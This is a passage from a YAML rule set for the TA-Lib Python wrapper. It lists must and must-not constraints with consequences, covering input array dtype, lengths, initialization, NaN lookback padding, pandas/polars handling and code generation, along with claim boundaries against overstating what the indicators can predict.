    action: call _ta_check_success and raise Exception on non-zero (failure) return codes
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Ignoring TA_RetCode errors silently propagates invalid computation results, leading to incorrect technical
      indicator values in trading strategies
    stage_ids:
    - c_wrapper
  - id: finance-C-004
    when: When validating array lengths for multi-input functions
    action: check each input arrays have identical length and raise Exception on mismatch
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Mismatched array lengths cause out-of-bounds memory access when TA-Lib iterates over arrays of different
      sizes
    stage_ids:
    - c_wrapper
  - id: finance-C-016
    when: When implementing batch indicator calculations using the func API
    action: Verify each input price arrays have float64 dtype (NPY_DOUBLE)
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Integer dtype input arrays cause runtime exceptions in the underlying TA-Lib C library, as demonstrated in
      test_func.py:17-20 where func.MOM(a1) raises Exception when a1 is np.arange(10, dtype=int)
    stage_ids:
    - func_api
  - id: finance-C-017
    when: When implementing batch indicator calculations using the func API
    action: Verify each input arrays are 1-dimensional
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Multi-dimensional arrays cause runtime exceptions, as real.ndim != 1 raises an exception in the check_array
      function
    stage_ids:
    - func_api
  - id: finance-C-018
    when: When implementing batch indicator calculations with multiple price inputs
    action: Verify each input price arrays have identical lengths
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Mismatched array lengths cause runtime exceptions, breaking the batch calculation pipeline as verified in
      test_func.py:23-33
    stage_ids:
    - func_api
  - id: finance-C-019
    when: When implementing batch indicator calculations using the func API
    action: Provide each required price arrays explicitly without relying on defaults
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: The func API has no default values for price arrays; all required arrays must be provided as positional or
      keyword arguments
    stage_ids:
    - func_api
  - id: finance-C-027
    when: When implementing batch indicator calculations using the func API
    action: Call the TA-Lib C library initialization before any function calls
    severity: fatal
    kind: resource_boundary
    modality: must
    consequence: Without initialization, TA_RetCode=1 (TA_LIB_NOT_INITIALIZE) is returned, causing all function calls to fail
    stage_ids:
    - func_api
  - id: finance-C-029
    when: When implementing stream function inputs
    action: pass numpy arrays with dtype=float64 (NPY_DOUBLE) to stream functions
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Stream functions raise 'input array type is not double' exception when passed non-double precision arrays,
      causing data loss or incorrect calculations in financial indicators
    stage_ids:
    - stream_api
  - id: finance-C-030
    when: When implementing stream function inputs
    action: pass 1-dimensional numpy arrays to stream functions
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Stream functions raise 'input array has wrong dimensions' exception when passed multi-dimensional arrays,
      breaking real-time indicator calculations
    stage_ids:
    - stream_api
  - id: finance-C-031
    when: When implementing stream functions with multiple price inputs
    action: pass input arrays of identical length to stream functions
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Stream functions raise 'input array lengths are different' exception when arrays mismatch, causing incorrect
      indicator values
    stage_ids:
    - stream_api
  - id: finance-C-034
    when: When calling stream functions
    action: use numpy.ndarray inputs (not plain Python lists or other sequences)
    severity: fatal
    kind: resource_boundary
    modality: must
    consequence: Stream functions require numpy arrays due to direct C API access via PyArray_TYPE() and PyArray_FLAGS(),
      causing runtime errors with non-array inputs
    stage_ids:
    - stream_api
  - id: finance-C-046
    when: When using the same Function instance across multiple threads
    action: use thread-local storage to maintain isolated state per thread
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: Without thread-local storage, concurrent threads would share state causing race conditions, incorrect results,
      and data corruption
    stage_ids:
    - abstract_api
  - id: finance-C-048
    when: When invalidating cached outputs
    action: set outputs_valid flag to False whenever inputs, parameters, or input_names change
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: Stale cached outputs would be returned even when underlying data or parameters have changed, producing incorrect
      results
    stage_ids:
    - abstract_api
  - id: finance-C-058
    when: When retrieving outputs from Function
    action: convert pandas.Series and polars.Series to numpy arrays before passing to TALIB
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Native pandas/polars Series objects would cause type errors in TALIB C function calls expecting numpy arrays
    stage_ids:
    - abstract_api
  - id: finance-C-059
    when: When implementing SMA or other TA-Lib functions to accept pandas Series input
    action: Return pandas.Series with the same index preserved from the input Series
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Breaking pandas index preservation causes downstream code to lose temporal alignment, leading to incorrect
      backtest results and misaligned signal generation
    stage_ids:
    - series_wrapper
  - id: finance-C-060
    when: When converting pandas or polars Series to numpy arrays for TA-Lib processing
    action: Apply astype(float) to the converted numpy array to verify numeric compatibility
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: TA-Lib C library requires float64 input; non-float arrays cause segmentation faults or incorrect calculations
      in technical indicators
    stage_ids:
    - series_wrapper
  - id: finance-C-062
    when: When both polars Series and pandas Series are detected in function arguments
    action: Mix polars and pandas types in the same function call
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: Mixed type processing creates ambiguity in output type selection and index handling, causing TypeError or
      incorrect result types in downstream code
    stage_ids:
    - series_wrapper
  - id: finance-C-069
    when: When generating Cython function bindings for TA-Lib
    action: Use double precision (NPY_DOUBLE) for each numeric array type checks
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Using float32 or other numeric types causes memory corruption and incorrect calculation results since TA-Lib
      internally uses double precision
    stage_ids:
    - code_generation
  - id: finance-C-070
    when: When validating input arrays in generated Cython functions
    action: Check that input arrays are C-contiguous and convert if necessary
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Non-C-contiguous arrays cause pointer arithmetic errors when accessing data pointers, leading to segmentation
      faults or corrupted output
    stage_ids:
    - code_generation
  - id: finance-C-075
    when: When regenerating code bindings
    action: Require ta-lib/ta_func.h header file to exist in one of the configured include paths
    severity: fatal
    kind: resource_boundary
    modality: must
    consequence: Code generation fails silently or produces incomplete bindings without the header file, breaking the build
      process
    stage_ids:
    - code_generation
  - id: finance-C-105
    when: When implementing or writing code that calls TA-Lib functions with multiple price arrays
    action: Verify each input price arrays have identical lengths — the Cython wrapper enforces length equality via check_length*
      functions
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Array length mismatch raises Exception('input array lengths are different'), causing function calls to fail
      with misleading error messages
  - id: finance-C-112
    when: When presenting or reporting TA-Lib indicator calculations to users or making capability claims
    action: Claim that TA-Lib technical indicators predict future prices, trends, or market movements — TA-Lib is a historical
      calculation library that computes past values from price data
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Users allocate capital based on false prediction claims, experiencing financial loss when historical indicator
      patterns fail to predict future market behavior
  - id: finance-C-115
    when: When presenting or reporting TA-Lib indicator values as equivalent to real-time trading signals
    action: Claim that TA-Lib indicator outputs alone constitute trading signals — TA-Lib computes mathematical values from
      price data, requiring additional strategy logic, risk management, and execution handling to generate actionable signals
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Users implement systems that generate trades based solely on indicator values without proper validation,
      risk controls, or execution logic, leading to uncontrolled losses
  - id: finance-C-120
    when: When importing the TA-Lib Python module
    action: Verify _ta_initialize() is called automatically at import time and atexit.register() is used to register shutdown
      handlers; any code that bypasses the import mechanism must manually call _ta_initialize() before invoking indicator
      functions
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Calling TA-Lib functions before initialization causes segmentation faults or undefined behavior; the C extension
      library requires internal state setup via _ta_initialize() to function correctly
    derived_from_bd_id: BD-081
  - id: finance-C-173
    when: When implementing or refactoring thread-safe data handling in TA-Lib multi-threaded usage
    action: Deep copy input data before any manipulation to verify each thread operates on an independent copy — do not remove
      or replace deep copying with alternative synchronization that assumes shared-data safety
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: Removing deep copy causes race conditions when multiple threads access shared data structures, leading to
      corrupted intermediate calculations and non-deterministic backtest results across runs
    derived_from_bd_id: BD-074
  regular:
  - id: finance-C-005
    when: When initializing the TA-Lib Python wrapper
    action: call _ta_initialize() on import and _ta_shutdown() on process exit via atexit
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without proper initialization, TA-Lib C library functions return TA_LIB_NOT_INITIALIZE errors, producing
      all-NaN outputs
    stage_ids:
    - c_wrapper
  - id: finance-C-006
    when: When implementing Cython functions that call TA-Lib C library
    action: apply @boundscheck(False) and @wraparound(False) decorators to disable Python safety checks
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without these decorators, every array access incurs Python bounds-checking overhead, negating the 2-4x performance
      benefit of Cython over SWIG
    stage_ids:
    - c_wrapper
  - id: finance-C-007
    when: When using integer optional parameters in TA-Lib function bindings
    action: use -2**31 (TA_INTEGER_DEFAULT) as the default sentinel value for optional integer parameters
    severity: high
    kind: domain_rule
    modality: must
    consequence: Using incorrect default values causes TA-Lib to use wrong default periods, producing incorrect technical
      indicator outputs
    stage_ids:
    - c_wrapper
  - id: finance-C-008
    when: When checking for contiguous memory layout of input arrays
    action: auto-convert non-contiguous arrays to C-contiguous via PyArray_GETCONTIGUOUS
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Non-contiguous arrays cause incorrect data access patterns in C functions, producing wrong indicator values
      or segmentation faults
    stage_ids:
    - c_wrapper
  - id: finance-C-009
    when: When building the TA-Lib Python wrapper from source
    action: verify TA-Lib C library is installed before running setup.py or pip install
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Build fails with 'Cannot find ta-lib library' warning or unresolved symbol linker errors without the underlying
      C library
    stage_ids:
    - c_wrapper
  - id: finance-C-010
    when: When building the TA-Lib Python wrapper
    action: use Cython to generate .c files, or use pre-generated .c files if Cython is unavailable
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Without Cython during build, the extension module cannot be compiled, breaking the entire package installation
    stage_ids:
    - c_wrapper
  - id: finance-C-011
    when: When specifying numpy version for TA-Lib compatibility
    action: use numpy<2 for TA-Lib 0.4.x branches and numpy>=2 for TA-Lib 0.5.x+ branches
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Using incompatible numpy version causes build failures or runtime crashes due to removed deprecated C APIs
      in numpy 2.0+
    stage_ids:
    - c_wrapper
  - id: finance-C-012
    when: When checking if TA-Lib wrapper import succeeds
    action: verify package imports without errors and __ta_version__ is accessible
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Import failure indicates missing C library, build errors, or ABI incompatibilities preventing the entire
      technical analysis functionality
    stage_ids:
    - c_wrapper
  - id: finance-C-013
    when: When building on Windows platforms
    action: use ta-lib-static as the library name instead of ta-lib on Windows
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Incorrect library name causes linker errors 'unresolved external symbol' for all TA-Lib functions on Windows
      builds
    stage_ids:
    - c_wrapper
  - id: finance-C-014
    when: When working with TA-Lib function output arrays
    action: initialize output arrays with NaN for lookback period and zeros for integer outputs
    severity: high
    kind: domain_rule
    modality: must
    consequence: Uninitialized output arrays contain garbage values that corrupt technical indicator calculations in the lookback
      period
    stage_ids:
    - c_wrapper
  - id: finance-C-015
    when: When handling NaN values in input price arrays
    action: find first valid (non-NaN) index via check_begidx functions to determine start of computation
    severity: medium
    kind: domain_rule
    modality: must
    consequence: TA-Lib handles NaN values unexpectedly - it propagates NaNs to end of output rather than skipping them like
      pandas rolling mean
    stage_ids:
    - c_wrapper
  - id: finance-C-020
    when: When implementing batch indicator calculations using the func API
    action: Fill the lookback period with NaN values to maintain output array length equal to input
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without NaN padding in the lookback period, output arrays would have different lengths than input arrays,
      breaking vectorized operations and alignment
    stage_ids:
    - func_api
  - id: finance-C-021
    when: When implementing batch indicator calculations for multi-output functions
    action: Return a tuple of arrays for functions like BBANDS (upperband, middleband, lowerband)
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Multi-output functions must return all outputs as a tuple; dropping outputs loses critical indicator data
    stage_ids:
    - func_api
  - id: finance-C-022
    when: When using unstable period functions (ADX, CMO, RSI, EMA, etc.)
    action: Call set_unstable_period() before invoking the function if non-default behavior is required
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Functions with unstable periods produce different results depending on the unstable period setting, leading
      to inconsistent or unexpected indicator values
    stage_ids:
    - func_api
  - id: finance-C-023
    when: When implementing batch indicator calculations using the func API
    action: Expect pandas-style rolling window NaN handling (where NaN in input only affects lookback period)
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: TA-Lib propagates NaN values to the end of output arrays, unlike pandas rolling mean which only has NaN in
      the lookback period; this causes unexpected output shapes when input contains NaN
    stage_ids:
    - func_api
  - id: finance-C-024
    when: When implementing batch indicator calculations using the func API
    action: Convert input arrays to C-contiguous memory layout if they are not already
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Non-contiguous input arrays are silently converted by PyArray_GETCONTIGUOUS, but explicit conversion prevents
      repeated memory copies during batch processing
    stage_ids:
    - func_api
  - id: finance-C-025
    when: When using the func API for batch processing
    action: Claim that output arrays contain valid values in the lookback period
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: The lookback period is filled with NaN (for double outputs) or 0 (for integer outputs); presenting these
      as valid indicator values is factually incorrect
    stage_ids:
    - func_api
  - id: finance-C-026
    when: When using the func API for batch processing
    action: Claim real-time or streaming capabilities for this batch processing API
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: The func API processes entire arrays in batch mode; it does not provide single-value updates like the stream
      API (talib.stream.SMA)
    stage_ids:
    - func_api
  - id: finance-C-028
    when: When specifying timeperiod or nbdev parameters to func API functions
    action: Provide explicit positive integer values, not relying on the sentinel default -2**31
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: The default value -2**31 is a sentinel that may cause unexpected behavior; explicit values ensure correct
      lookback calculation
    stage_ids:
    - func_api
  - id: finance-C-032
    when: When passing data to stream functions
    action: handle NaN return values when insufficient data is available for the timeperiod
    severity: high
    kind: domain_rule
    modality: must
    consequence: Stream functions return NaN when input data length is less than the required timeperiod, causing invalid
      financial calculations if not checked
    stage_ids:
    - stream_api
  - id: finance-C-033
    when: When using stream functions for real-time computation
    action: reprocess entire input array on each call (no internal state persistence)
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Stream functions do not maintain internal state between calls, requiring full array reprocessing each time
      and negating 'streaming' performance benefits
    stage_ids:
    - stream_api
  - id: finance-C-035
    when: When implementing streaming indicator updates
    action: claim true real-time streaming when stream functions process full arrays
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Describing stream API as 'real-time streaming' is misleading since each call processes the entire input array,
      not incremental updates
    stage_ids:
    - stream_api
  - id: finance-C-036
    when: When comparing batch and stream function results
    action: verify stream output equals the last element of batch output array
    severity: high
    kind: domain_rule
    modality: must
    consequence: The stream function's scalar output MUST equal the final element of the batch function's array output, otherwise
      financial strategy signals will be incorrect
    stage_ids:
    - stream_api
  - id: finance-C-037
    when: When implementing stream functions with integer parameters
    action: use TA_INTEGER_DEFAULT (-2**31) for unspecified integer parameters
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Integer parameters without explicit values use -2**31 as sentinel, and passing this value directly causes
      undefined TA-Lib behavior
    stage_ids:
    - stream_api
  - id: finance-C-038
    when: When implementing stream functions with floating-point parameters
    action: use TA_REAL_DEFAULT (-4e37) for unspecified real parameters
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Real parameters without explicit values use -4e37 as sentinel, and passing this value directly causes undefined
      TA-Lib behavior
    stage_ids:
    - stream_api
  - id: finance-C-039
    when: When calling TA-Lib C functions from stream API
    action: check return codes and raise exceptions on TA library errors
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Unchecked TA_RetCode values can mask critical errors like library not initialized, bad parameters, or allocation
      failures
    stage_ids:
    - stream_api
  - id: finance-C-040
    when: When using the streaming API
    action: use the experimental stream API for production trading systems without validation
    severity: high
    kind: operational_lesson
    modality: must_not
    consequence: The streaming API is marked experimental in CHANGELOG and lacks state persistence for true incremental computation,
      risking production trading failures
    stage_ids:
    - stream_api
  - id: finance-C-041
    when: When implementing custom stream functions
    action: apply @boundscheck(False) and @wraparound(False) decorators
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Missing Cython decorators causes significant performance degradation for real-time financial calculations
      due to bounds checking overhead
    stage_ids:
    - stream_api
  - id: finance-C-042
    when: When converting batch function parameters to stream parameters
    action: use identical parameter names and types for easy switching between APIs
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Parameter mismatches between batch and stream functions cause incorrect indicator calculations when developers
      switch between APIs
    stage_ids:
    - stream_api
  - id: finance-C-043
    when: When initializing a Function instance without specifying price series
    action: default to using 'close' prices for the 'price' input parameter
    severity: high
    kind: domain_rule
    modality: must
    consequence: Indicator calculations will use the wrong price series, producing incorrect technical analysis values that
      do not match expected results
    stage_ids:
    - abstract_api
  - id: finance-C-044
    when: When providing invalid parameter types to Function
    action: raise TypeError with descriptive message showing expected and actual types
    severity: high
    kind: domain_rule
    modality: must
    consequence: Invalid parameter types may silently produce incorrect results or cause undefined behavior in TA-Lib calculations
    stage_ids:
    - abstract_api
  - id: finance-C-045
    when: When creating Function instances with function names
    action: normalize function names to uppercase for case-insensitive lookup
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Case-sensitive function name lookup would break API usability, as users commonly use lowercase function names
    stage_ids:
    - abstract_api
  - id: finance-C-047
    when: When Function inputs and parameters remain unchanged between calls
    action: cache outputs and skip recomputation to improve performance
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Repeated calculations with identical inputs would unnecessarily recompute results, degrading performance
      in tight loops
    stage_ids:
    - abstract_api
  - id: finance-C-049
    when: When calling __call__ with function parameters
    action: restore opt_input values and input_names after the call to preserve Function state
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: State changes from temporary calls would persist, causing subsequent uses of the Function instance to use
      wrong parameters
    stage_ids:
    - abstract_api
  - id: finance-C-050
    when: When input arrays are missing required keys
    action: raise Exception listing each missing required data keys
    severity: high
    kind: domain_rule
    modality: must
    consequence: Silent failure or partial computation with missing data would produce undefined or incorrect indicator values
    stage_ids:
    - abstract_api
  - id: finance-C-051
    when: When providing price arguments to Function.__call__
    action: validate the number of price arguments matches expected count
    severity: high
    kind: domain_rule
    modality: must
    consequence: Wrong number of price arguments would cause index errors or compute indicators on wrong price series
    stage_ids:
    - abstract_api
  - id: finance-C-052
    when: When input data type is pandas.DataFrame or polars.DataFrame
    action: return output as the same DataFrame type with specified column names and index
    severity: high
    kind: claim_boundary
    modality: must
    consequence: Mismatched output types would break downstream code expecting consistent DataFrame interface and index alignment
    stage_ids:
    - abstract_api
  - id: finance-C-053
    when: When abstract API is used for backtesting or strategy development
    action: claim that backtest results equal expected live trading performance
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Backtest results do not account for slippage, market impact, execution delays, or changing market conditions
      that affect live trading
    stage_ids:
    - abstract_api
  - id: finance-C-054
    when: When the TA-Lib Python wrapper is used
    action: claim real-time trading capability for this library
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: This is a technical analysis indicator library for historical data computation, not a live trading execution
      system
    stage_ids:
    - abstract_api
  - id: finance-C-055
    when: When setting input_arrays
    action: verify each arrays have the same length
    severity: high
    kind: domain_rule
    modality: must
    consequence: Array length mismatches would cause index errors or silent data truncation in TA-Lib calculations
    stage_ids:
    - abstract_api
  - id: finance-C-056
    when: When extending Function class for custom data types
    action: call the parent set_input_arrays method first and return True/False appropriately
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Improper subclassing would break input validation and cause silent failures or incorrect calculations
    stage_ids:
    - abstract_api
  - id: finance-C-057
    when: When accessing input_arrays property for polars.DataFrame
    action: use clone() instead of copy() for polars DataFrames
    severity: high
    kind: domain_rule
    modality: must
    consequence: Using copy() on polars DataFrames would cause runtime errors as polars uses clone() for copying
    stage_ids:
    - abstract_api
  - id: finance-C-061
    when: When detecting input Series type for appropriate conversion handling
    action: Check both positional args and keyword args for Series type using isinstance
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Missing keyword argument check causes functions called with Series as keyword argument to bypass conversion,
      passing Series objects to TA-Lib C library which expects numpy arrays
    stage_ids:
    - series_wrapper
  - id: finance-C-063
    when: When neither pandas nor polars is available in the runtime environment
    action: Use identity wrapper that returns functions unchanged without type checking overhead
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Without identity wrapper fallback, every TA-Lib function call incurs unnecessary isinstance checks for None
      types, degrading performance for numpy-only users
    stage_ids:
    - series_wrapper
  - id: finance-C-064
    when: When handling optional dependencies pandas and polars for lazy loading
    action: Catch ModuleNotFoundError and only set Series types to None for known missing modules
    severity: high
    kind: domain_rule
    modality: must
    consequence: Silent import failure for broken but installed pandas/polars masks real module errors, causing cryptic failures
      in TA-Lib function calls
    stage_ids:
    - series_wrapper
  - id: finance-C-065
    when: When TA-Lib functions return streaming results (non-array outputs)
    action: Return streaming results directly without Series wrapping to preserve streaming interface
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Wrapping streaming results as Series breaks the streaming API contract, causing TypeError in code expecting
      scalar or iterator results
    stage_ids:
    - series_wrapper
  - id: finance-C-066
    when: When wrapping polars Series output from TA-Lib function results
    action: Wrap numpy array results as polars.Series without passing index parameter
    severity: high
    kind: domain_rule
    modality: must
    consequence: Passing index to polars.Series constructor causes TypeError since polars does not support named index like
      pandas; results are correctly converted without index
    stage_ids:
    - series_wrapper
  - id: finance-C-067
    when: When TA-Lib function returns tuple results for multi-output indicators
    action: Wrap each element of tuple result as a separate Series preserving the common index
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Returning tuple of arrays instead of Series breaks type consistency; downstream code expecting Series with
      proper index alignment fails with shape or index errors
    stage_ids:
    - series_wrapper
  - id: finance-C-068
    when: When using polars or pandas Series with MAVP function requiring period arrays
    action: Extract index from the price Series input, not from the period array argument
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Using period array index causes misalignment with price data; the output must align with price timestamps,
      not period values
    stage_ids:
    - series_wrapper
  - id: finance-C-071
    when: When generating function signatures from C headers
    action: Skip TA_Set* and TA_Restore* configuration functions to keep only public indicator functions
    severity: high
    kind: domain_rule
    modality: must
    consequence: Including configuration functions creates bindings that conflict with the abstract API, causing runtime errors
      when users attempt to configure TA-Lib settings
    stage_ids:
    - code_generation
  - id: finance-C-072
    when: When regenerating _func.pxi after upstream TA-Lib changes
    action: Verify that __TA_FUNCTION_NAMES__ contains at least 150 function names
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Missing functions in __TA_FUNCTION_NAMES__ causes AttributeError when users try to call those indicators,
      breaking the public API
    stage_ids:
    - code_generation
  - id: finance-C-073
    when: When parsing C header file signatures
    action: Strip float-only functions (TA_S_*) to avoid generating bindings for deprecated interfaces
    severity: high
    kind: domain_rule
    modality: must
    consequence: Float-only functions use different calling conventions and cause type mismatches when bound to double-based
      Python arrays
    stage_ids:
    - code_generation
  - id: finance-C-074
    when: When generating function lookback calculations
    action: Calculate lookback as 'begidx + lib.{FuncName}_Lookback(options)' to determine proper result array padding
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Incorrect lookback causes output arrays to be misaligned with input arrays, resulting in NaN values in wrong
      positions or index errors
    stage_ids:
    - code_generation
  - id: finance-C-076
    when: When discovering TA-Lib header files across platforms
    action: Check platform-specific paths including /usr/include, /usr/local/include, /opt/local/include, and /opt/homebrew/include
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Omitting platform-specific paths causes header discovery to fail on different operating systems, preventing
      code generation
    stage_ids:
    - code_generation
  - id: finance-C-077
    when: When running 'make generate' to regenerate bindings
    action: Verify both Python talib package and C TA-Lib library are installed
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Regeneration fails with import errors or header not found errors if dependencies are missing
    stage_ids:
    - code_generation
  - id: finance-C-078
    when: When cleaning up C variable names to Pythonic names
    action: Strip 'in' prefix for input variables and 'optIn' prefix for optional parameters
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Inconsistent naming causes TypeError when calling functions with keyword arguments that don't match the generated
      signatures
    stage_ids:
    - code_generation
  - id: finance-C-079
    when: When generating type stubs from runtime introspection
    action: Use NDArray[np.float64] for each function inputs and outputs
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Type stubs with incorrect array dtypes cause mypy/pyright to report false positives about type mismatches
    stage_ids:
    - code_generation
  - id: finance-C-080
    when: When regenerating _func.pxi and _stream.pxi
    action: Output files must be redirected to their respective locations using shell redirection
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Writing to stdout instead of redirecting causes generated code to be lost and build failures
    stage_ids:
    - code_generation
  - id: finance-C-081
    when: When making manual edits to generated _func.pxi file
    action: Edit _func.pxi directly since it will be overwritten on next generation
    severity: medium
    kind: operational_lesson
    modality: must_not
    consequence: Direct edits are lost during regeneration, causing confusion and wasted development effort
    stage_ids:
    - code_generation
  - id: finance-C-082
    when: When developing new indicator functions in underlying TA-Lib
    action: Install TA-Lib from git source to have headers available for code generation
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Binary TA-Lib installations may not include development headers needed for code generation
    stage_ids:
    - code_generation
  - id: finance-C-083
    when: When running code generation for TA-Lib
    action: Modify the generator scripts (generate_func.py, generate_stream.py) without understanding the ta_func.h structure
    severity: medium
    kind: rationalization_guard
    modality: should_not
    consequence: Incorrect parser modifications cause function signatures to be malformed, leading to Cython compilation errors
    stage_ids:
    - code_generation
  - id: finance-C-084
    when: When TA-Lib adds new indicator functions in upstream
    action: Regenerate _func.pxi and _stream.pxi to add bindings for new functions
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Missing bindings for new TA-Lib functions causes AttributeError when users try to use them
    stage_ids:
    - code_generation
  - id: finance-C-085
    when: When generating INDEX-type functions that output indices
    action: Add index offset adjustment loop after function call to convert internal indices to absolute positions
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: INDEX functions return relative indices that must be adjusted by begidx, otherwise returned indices are incorrect
    stage_ids:
    - code_generation
  - id: finance-C-086
    when: When generating stream functions (stream_*)
    action: Name functions with 'stream_' prefix to distinguish from batch functions
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Conflicting names between batch and stream functions cause import errors or wrong function resolution
    stage_ids:
    - code_generation
  - id: finance-C-087
    when: When implementing user_code that passes pandas/polars Series to TA-Lib
    action: pass float64-compatible Series values that can be converted to contiguous numpy arrays
    severity: high
    kind: domain_rule
    modality: must
    consequence: TypeError raised when Series dtype cannot be cast to float64, or MemoryError during non-contiguous array
      copy operations for large datasets
  - id: finance-C-088
    when: When implementing user_code that mixes pandas and polars inputs
    action: mix pandas and polars Series/DataFrame in the same function call
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Exception raised with message 'Cannot mix polars and pandas', causing the entire function call to fail
  - id: finance-C-089
    when: When implementing series_wrapper that extracts numpy arrays from Series
    action: preserve the original pandas index for downstream return value wrapping
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Index mismatch causes pandas alignment errors when result Series index does not match original input index
  - id: finance-C-090
    when: When implementing series_wrapper that converts pandas/polars inputs to numpy
    action: convert input arrays to float64 dtype before passing to func_api
    severity: high
    kind: domain_rule
    modality: must
    consequence: TypeError raised by func_api check_array() when input dtype is not NPY_DOUBLE, causing indicator calculation
      to fail
  - id: finance-C-091
    when: When implementing series_wrapper that passes data to func_api
    action: verify each input arrays have identical length values
    severity: high
    kind: domain_rule
    modality: must
    consequence: Exception raised with 'input array lengths are different', causing the function to fail before any calculation
  - id: finance-C-092
    when: When implementing series_wrapper that passes dict/DataFrame to abstract_api
    action: provide each required price series keys (open, high, low, close, volume as needed by the specific function)
    severity: high
    kind: domain_rule
    modality: must
    consequence: Exception raised with 'input_arrays parameter missing required data key', preventing function execution
  - id: finance-C-093
    when: When implementing abstract_api that extracts arrays from dict/DataFrame
    action: convert extracted pandas/polars Series to float64 numpy arrays before passing to func_api
    severity: high
    kind: domain_rule
    modality: must
    consequence: TypeError or incorrect calculation results when Series with non-float64 dtype is passed to TA-Lib C function
  - id: finance-C-094
    when: When implementing abstract_api that passes data to func_api
    action: verify each price series arrays in the input dict have identical length
    severity: high
    kind: domain_rule
    modality: must
    consequence: Exception raised at runtime when length validation fails inside func_api, with 'input array lengths are different'
  - id: finance-C-095
    when: When implementing func_api that passes arrays to c_wrapper
    action: convert input arrays to C-contiguous memory layout if not already contiguous
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Silent automatic conversion causes memory copy overhead; for streaming/large datasets this creates significant
      performance degradation
  - id: finance-C-096
    when: When implementing c_wrapper that passes data to func_api
    action: pad output arrays with NaN values for the lookback period (first lookback elements)
    severity: high
    kind: domain_rule
    modality: must
    consequence: Financial indicators show incorrect values when lookback NaN padding is missing, causing wrong trading signals
      and financial losses
  - id: finance-C-097
    when: When implementing c_wrapper that returns results to func_api
    action: propagate TA_RetCode error codes and raise Python exceptions for non-zero return values
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Silent failure or incorrect results when TA-Lib C library returns error code that is not converted to exception
  - id: finance-C-098
    when: When implementing c_wrapper that processes inputs from func_api
    action: compute beginning index (begidx) by finding first non-NaN value across each input arrays
    severity: high
    kind: domain_rule
    modality: must
    consequence: Incorrect indicator values when NaN detection fails, causing misaligned outputs and wrong trading decisions
  - id: finance-C-099
    when: When implementing abstract_api that passes results to series_wrapper
    action: return results matching the input type (polars.DataFrame returns polars.DataFrame, pandas.DataFrame returns pandas.DataFrame)
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: TypeError when downstream code expects specific return type but receives numpy array instead of DataFrame/Series
  - id: finance-C-100
    when: When implementing series_wrapper that returns pandas Series to user_code
    action: wrap numpy results in pandas Series preserving the original input index
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Index misalignment in result Series causes pandas alignment issues and incorrect data analysis in downstream
      code
  - id: finance-C-101
